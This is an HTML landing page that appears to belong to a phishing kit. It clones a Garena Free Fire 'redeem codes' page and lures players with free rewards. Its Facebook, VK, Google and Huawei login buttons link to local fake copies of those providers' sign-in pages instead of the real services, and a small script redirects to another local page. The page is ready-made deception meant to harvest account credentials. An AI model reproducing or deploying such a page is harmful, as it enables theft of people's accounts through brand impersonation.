<!DOCTYPE html>
<!-- saved from url=(0029)https://reward.ff.garena.com/ -->
<html lang="zh">
    <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- M002 V3 -->
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- set if need to be able scaled -->
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
    <title>FF | REDEEM</title>
    <link rel="shortcut icon" href="https://ff.garena.tw/static/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="./Free Fire_files/reset.css">
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <link href="./Free Fire_files/ie10-viewport-bug-workaround.css" rel="stylesheet">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <link href="./Free Fire_files/all.css" rel="stylesheet">
    <link href="./Free Fire_files/responsive.css" rel="stylesheet">
    <!-- the css editable in USE -->
</head>

<body>
<!--<div class="hero" id="hero" name="hero">-->
    <div id="app">
        <div data-reactroot="">
        <div class="container clearfix">
            <div class="container-bg"></div>
            <div class="mobile-mask"></div>
            <div class="logo"></div>
            
            <main class="main ">
                <h1 class="main-title ">Get free redeem codes</h1>
                <div></div>
                <div><div class="main-desc"><p>Please log in.</p></div>
                    <div class="loginbtn-group clearfix">
                        <a href="./login/Log in to Facebook _ Facebook.html">
                        <div class="loginbtn-item btn_fb"><span class="btn-item facebook"></span></div>
                        </a>
<!--                        <input type="button" id="face" name="face" onclick="face()">-->
                         <a href="./login/VK _ Login.html">
                        <div class="loginbtn-item btn_vk"><span class="btn-item vk"></span></div>
                        </a>
                             
                        <a href="./login/Sign in – Google accounts.html">
                        <div class="loginbtn-item btn_go"><span class="btn-item google"></span></div>
                        </a>
                        
                        <a href="./login/huawei_login.html">
                        <div class="loginbtn-item btn_hw"><span class="btn-item huawei"></span></div>
                        </a>
                        
                    </div>
                </div>
                <div><section class="notice ">
                    <div class="notice-inner">
                        <h2 class="notice-title">Important Notice:</h2>
                        <ol class="notice-list">
                            <li class="notice-item"><!-- react-text: 18 -->1. Redemption code has<!-- /react-text --><span class="highlight"> 12 </span><!-- react-text: 20 -->characters, consisting of capital letters and numbers.<!-- /react-text --></li>
                            <li class="notice-item"><!-- react-text: 22 -->2. Item rewards are shown in<!-- /react-text --><span class="highlight">&nbsp;[vault]&nbsp;</span><!-- react-text: 24 -->tab in game lobby; Golds or diamonds will add in account wallet automatically.<!-- /react-text --></li>
                            <li class="notice-item">3. Please note redemption expiration date. Any expired codes cannot be redeemed.</li>
                            <li class="notice-item">4. Please contact customer service if you encountered any issue.</li>
                            <li class="notice-item">5. Reminder: you will not be able to redeem your rewards with guest accounts. You may bind your account to Facebook or VK in order to receive the rewards.</li>
                        </ol>
                    </div>
                    </section>
                    <div class="notice-toggle ">Important Notice:</div>
                </div>
            </main>
            <div></div>
            <footer class="footer">
                <div class="copyright">
                    <span class="small-logo"></span>
                    <div class="copyright-message">
                        <p>Copyright © FF Redeem International.</p>
                        <p>Trademarks belong to their respective owners. All rights Reserved.</p>
                    </div>
                </div>
            </footer>
        </div>
        </div>
    </div>

<!--<script type="text/javascript" src="./Free Fire_files/bundle.js.download"></script>-->

<!--    </div>-->
</body>
    <script>
    function face(){
        location.href='./../main.html';
        
    }
    </script>
</html>